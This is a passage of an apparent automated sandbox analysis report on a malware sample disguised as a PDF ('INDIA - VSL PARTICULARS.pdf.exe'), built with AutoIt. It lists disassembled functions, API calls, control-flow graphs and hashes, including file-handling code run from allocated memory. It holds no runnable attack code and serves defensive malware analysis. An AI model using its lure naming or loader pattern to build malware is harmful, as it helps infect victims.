                                • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • _wcscpy.LIBCMT ref: 0040E487
                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • _wcscat.LIBCMT ref: 00427541
                              • _wcslen.LIBCMT ref: 00427551
                              • _wcslen.LIBCMT ref: 00427562
                              • _wcscat.LIBCMT ref: 0042757C
                              • _wcsncpy.LIBCMT ref: 004275BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                              • String ID: Include$\
                              • API String ID: 3173733714-3429789819
                              • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                              • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                              Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • _fseek.LIBCMT ref: 0045292B
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452961
                              • __fread_nolock.LIBCMT ref: 00452971
                              • __fread_nolock.LIBCMT ref: 0045298A
                              • __fread_nolock.LIBCMT ref: 004529A5
                              • _fseek.LIBCMT ref: 004529BF
                              • _malloc.LIBCMT ref: 004529CA
                              • _malloc.LIBCMT ref: 004529D6
                              • __fread_nolock.LIBCMT ref: 004529E7
                              • _free.LIBCMT ref: 00452A17
                              • _free.LIBCMT ref: 00452A20
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                              • String ID:
                              • API String ID: 1255752989-0
                              • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                              • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                              Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • ImageList_ReplaceIcon.COMCTL32(00AC3130,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                              Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AC3130,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                              Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _malloc
                              • String ID: Default
                              • API String ID: 1579825452-753088835
                              • Opcode ID: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                              • Opcode Fuzzy Hash: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                              Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock_fseek_memmove_strcat
                              • String ID: AU3!$EA06
                              • API String ID: 1268643489-2658333250
                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                              Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2007 42b038-42b03f 2001->2007 2011 401193-40119a 2002->2011 2004 401151-401157 2003->2004 2005 40119d 2003->2005 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2000 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2001 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2000 2012->2001 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2000 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2001 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2000 2021->2000 2022->2001 2030 401174-42afde call 45fd57 2022->2030 2027->2011 2028 401204-401216 CreatePopupMenu 2027->2028 2030->2000 2045 42afe4 2030->2045 2045->2011
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                              • CreatePopupMenu.USER32 ref: 00401204
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                              Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                              APIs
                              • _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • std::exception::exception.LIBCMT ref: 00411626
                              • std::exception::exception.LIBCMT ref: 00411640
                              • __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: ,*H$4*H$@fI
                              • API String ID: 615853336-1459471987
                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                              Function 03F1DDE8 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2065 3f1dde8-3f1de3a call 3f1dce8 CreateFileW 2068 3f1de43-3f1de50 2065->2068 2069 3f1de3c-3f1de3e 2065->2069 2072 3f1de63-3f1de7a VirtualAlloc 2068->2072 2073 3f1de52-3f1de5e 2068->2073 2070 3f1df9c-3f1dfa0 2069->2070 2074 3f1de83-3f1dea9 CreateFileW 2072->2074 2075 3f1de7c-3f1de7e 2072->2075 2073->2070 2076 3f1deab-3f1dec8 2074->2076 2077 3f1decd-3f1dee7 ReadFile 2074->2077 2075->2070 2076->2070 2079 3f1dee9-3f1df06 2077->2079 2080 3f1df0b-3f1df0f 2077->2080 2079->2070 2082 3f1df11-3f1df2e 2080->2082 2083 3f1df30-3f1df47 WriteFile 2080->2083 2082->2070 2084 3f1df72-3f1df97 CloseHandle VirtualFree 2083->2084 2085 3f1df49-3f1df70 2083->2085 2084->2070 2085->2070
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03F1DE2D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                              • Instruction ID: fb1189dce2f414163c0469ab660500bc9d2b48ad009bd512565c0d8a9dee1e78
                              • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                              • Instruction Fuzzy Hash: 8E51E876A50209FFEF24DFA4DC59FEE7778AF48701F108954F60AEB180DA74A6448B60
                              Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2095 4102b0-4102c5 SHGetMalloc 2096 4102cb-4102da SHGetDesktopFolder 2095->2096 2097 425dfd-425e0e call 433244 2095->2097 2098 4102e0-41031a call 412fba 2096->2098 2099 41036b-410379 2096->2099 2107 410360-410368 2098->2107 2108 41031c-410331 SHGetPathFromIDListW 2098->2108 2099->2097 2105 41037f-410384 2099->2105 2107->2099 2109 410351-41035d 2108->2109 2110 410333-41034a call 412fba 2108->2110 2109->2107 2110->2109
                              APIs
                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • _wcsncpy.LIBCMT ref: 004102ED
                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • _wcsncpy.LIBCMT ref: 00410340
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                              • String ID: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 3170942423-2945655381
                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                              Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2113 401250-40125c 2114 401262-401293 call 412f40 call 401b80 2113->2114 2115 4012e8-4012ed 2113->2115 2120 4012d1-4012e2 KillTimer SetTimer 2114->2120 2121 401295-4012b5 2114->2121 2120->2115 2122 4012bb-4012bf 2121->2122 2123 4272ec-4272f2 2121->2123 2124 4012c5-4012cb 2122->2124 2125 42733f-427346 2122->2125 2126 4272f4-427315 Shell_NotifyIconW 2123->2126 2127 42731a-42733a Shell_NotifyIconW 2123->2127 2124->2120 2128 427393-4273b4 Shell_NotifyIconW 2124->2128 2129 427348-427369 Shell_NotifyIconW 2125->2129 2130 42736e-42738e Shell_NotifyIconW 2125->2130 2126->2120 2127->2120 2128->2120 2129->2120 2130->2120
                              APIs
                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 3300667738-0
                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                              Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
